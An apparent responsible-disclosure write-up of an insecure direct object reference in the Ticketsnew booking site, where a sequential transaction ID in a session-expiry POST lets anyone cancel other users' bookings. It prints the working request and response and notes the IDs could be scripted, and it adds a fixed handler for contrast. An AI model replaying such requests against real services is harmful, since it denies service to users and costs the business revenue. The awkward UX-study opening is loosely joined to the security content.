
Ticketsnew Movie Booking Software and Securities

Overview of Ticketsnew

This case study is based on the movie booking application Ticketsnew. It is fairly popular, with over 50 downloads on the Android app store. The app offers a good, up-to-date place to check for films and cinemas around you, and booking tickets is now an effortless, fun and exciting experience for its users. My main goal was to understand more about the problems Ticketsnew app users currently face and to introduce some additional features that would create a better user experience and ease of use.


Problem Statement of Ticketsnew

The goal: to improve the current features of the app and make the overall user experience much more immersive and easy. On the basis of this initial problem statement, I started to dig deep into the topic, beginning with user research. Ticketsnew is an online portal for booking film tickets in all the major cities in India. The company was acquired by PayTM and is backed by Alibaba Pictures because of its growing customer base and easy UX.

Recently I discovered a bug that could have stopped you from booking tickets on the website. While I was examining GET and POST requests across the application by intercepting them with Burp Suite, I noticed a POST request that was used to expire my current user session. This request caught my attention because it had the transaction ID as a parameter.

Request 

POST /calls/ExpiresOngoingTrans HTTP/1.1
Host: www.ticketsnew.com
Connection: close
Content-Length: 20
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://www.ticketsnew.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Content-Type: application/json; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=lhmdgjpzu0cxqijhm1aecetk;

{"TransID":60500852}

My first thought was to try to expire other users' sessions by changing the ID. I sent the request to Burp Repeater and replaced the 'TransID' with that of another user session I had initiated in incognito mode in a different browser. And boom, the session expired even before the allotted time given by Ticketsnew.

Response on Ticketsnew

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 21:04:17 GMT
Server: Microsoft-IIS/8.5
Set-Cookie: tkttransid=60500800; expires=Sat, 06-Feb-2010 21:04:17 GMT; path=/
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 9
Connection: Close

{"d":"1"}

Ticketsnew has no check on where the request comes from or whether the change it makes is authorized. An interesting thing I noticed was that the transaction IDs assigned to sessions were sequential. So it was easy for me to predict the next session IDs and send the POST request. Writing a script that sends the POST request for consecutive IDs wouldn't be difficult for anyone. Using this bug, anyone could prevent a user from booking tickets until they get frustrated and leave the website, causing potential revenue loss to the company.
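The missing check described above, shown next to a corrected handler. This is an added example, not Ticketsnew's code: the class, its method names, the session strings and the {"d": "0"} refusal value are assumptions made for illustration, and an in-memory store stands in for the real backend.

```python
import secrets

class TransactionStore:
    """In-memory stand-in for the booking backend (constructed for this example)."""

    def __init__(self):
        self._owner = {}      # transaction id -> owning session id
        self._active = set()  # ids of transactions still holding seats

    def start(self, session_id):
        # Random 128-bit id instead of a counter: the next id cannot be predicted.
        trans_id = secrets.token_hex(16)
        self._owner[trans_id] = session_id
        self._active.add(trans_id)
        return trans_id

    def is_active(self, trans_id):
        return trans_id in self._active

    def expire_unchecked(self, trans_id):
        # Behaviour described in the article: any caller can expire any id.
        self._active.discard(trans_id)
        return {"d": "1"}

    def expire_checked(self, session_id, trans_id):
        # Ownership check: the transaction must belong to the caller's session.
        owner = self._owner.get(trans_id)
        if owner is None or not secrets.compare_digest(owner, session_id):
            # Same answer for "unknown id" and "someone else's id", so the
            # endpoint cannot be used to probe which ids exist.
            # ({"d": "0"} is an assumed refusal value, not from the article.)
            return {"d": "0"}
        self._active.discard(trans_id)
        return {"d": "1"}


def demo():
    store = TransactionStore()
    owner, other = "session-owner", "session-other"  # constructed session ids
    t1 = store.start(owner)
    store.expire_unchecked(t1)             # sent from a different session
    unchecked_survived = store.is_active(t1)
    t2 = store.start(owner)
    refused = store.expire_checked(other, t2)
    survived = store.is_active(t2)
    allowed = store.expire_checked(owner, t2)
    return unchecked_survived, refused, survived, allowed, store.is_active(t2)
```

The session id passed to expire_checked must come from the server-side session (here, the ASP.NET_SessionId cookie lookup), never from the request body.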

Ticketsnew is a fairly large company with PayTM as its parent company, yet the response was not professional. However, since the bug is resolved, I have written this article following the responsible disclosure policy.
